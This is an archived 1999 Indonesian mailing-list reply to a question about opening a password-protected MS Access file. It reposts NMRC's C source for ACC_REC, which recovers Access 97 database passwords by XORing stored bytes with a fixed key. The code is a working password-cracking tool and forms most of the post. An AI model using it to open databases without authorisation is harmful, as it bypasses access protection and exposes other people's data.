Re: [ Hackerlink ] ? Password di Access

Sat, 27 Nov 1999 18:55:21 -0800 

At 22:03 27/11/1999 +0700, **Fandhy HS**, has written a message, and here
is the reply :
>Hallo teman-teman,
>
>ada yang tau caranya membuka file MS Access (*.mdb) yang dipassword? 
>terima kasih atas bantuannya...

          Recover Access 97 Passwords
----------------------------------------------------------------------------
----


DETAILS

Access 97 Password storing algorithm is quite easy to break. In fact NMRC 
has released a source code that retrieves the passwords from the Access 
database within seconds.

The source code follows:

/*************************************************************************
  ACC_REC - Access 97 Password Recovery
  Written by Simple Nomad [[EMAIL PROTECTED]] 17Sept99
  http://www.nmrc.org/
 
  Compile using DJ Delorie's excellent port of the GNU compiler, which is
  available from http://www.delorie.com/

  Thanks to Yan for pointing us to the sekrit string!
 
*************************************************************************/

/* includes */
#include <stdio.h>
#include <stdlib.h>

/*
 * Main program....
 */
int main(int argc, char *argv[])
{
  FILE *fDatabase;
  int i;
  unsigned char recover[13];
  unsigned char password[13];
  unsigned char 
sekrit[13]={0x86,0xFB,0xEC,0x37,0x5D,0x44,0x9C,0xFA,0xC6,0x5E,0x28,0xE6,0x13};

/* Say hello... */
  printf("ACC_REC - Recover the password for Microsoft Access 
databases\n");
  printf("Comments/bugs: [EMAIL PROTECTED]\n");
  printf("http://www.nmrc.org/\n");
  printf("1999 (c) Nomad Mobile Research Centre\n");
  printf("Database filename must be in 8.3 format\n\n");

  if (argc!=2)
  {
    printf("USAGE: acc_rec <database>\n\n");
    printf("EXAMPLES:\n");
    printf("  acc_rec secretz.mdb\n");
    exit(-1);
  }

  fDatabase=fopen(argv[1],"rb");
  if (fDatabase == NULL)
  {
    printf("Unable to open database file %s.\n",argv[1]);
    exit(1);
  }
  fseek(fDatabase,66,SEEK_SET);
  fread(&recover,13,1,fDatabase);
  fclose(fDatabase);

  if (!memcmp(recover,sekrit,13))
  {
    printf("There is no password set for database %s\n",argv[1]);
    exit(0);
  }

  for (i=0;i<13;i++) password[i]=recover[i]^sekrit[i];
  printf("The password is - ");
  for (i=0;i<13;i++) 
  {
    if (isprint(password[i]))
      printf("%c",password[i]);
  }
  printf("\n");
}



ADDITIONAL INFORMATION

This source code has been provided by:  <http://www.nmrc.org/> NMRC.



======================================== 

-------
AFLHI 058009990407128029/089802---(102598//991024)

    milis ini didukung oleh :
 >> http://www.indolinux.com - dunia linux indonesia
 -------------------------------------------------------------------
 untuk berhenti kirim  email  ke  [EMAIL PROTECTED]
 untuk melihat peraturan kirim email  ke  [EMAIL PROTECTED]
 arsip berada di  http://www.mail-archive.com/[email protected]

Kirim email ke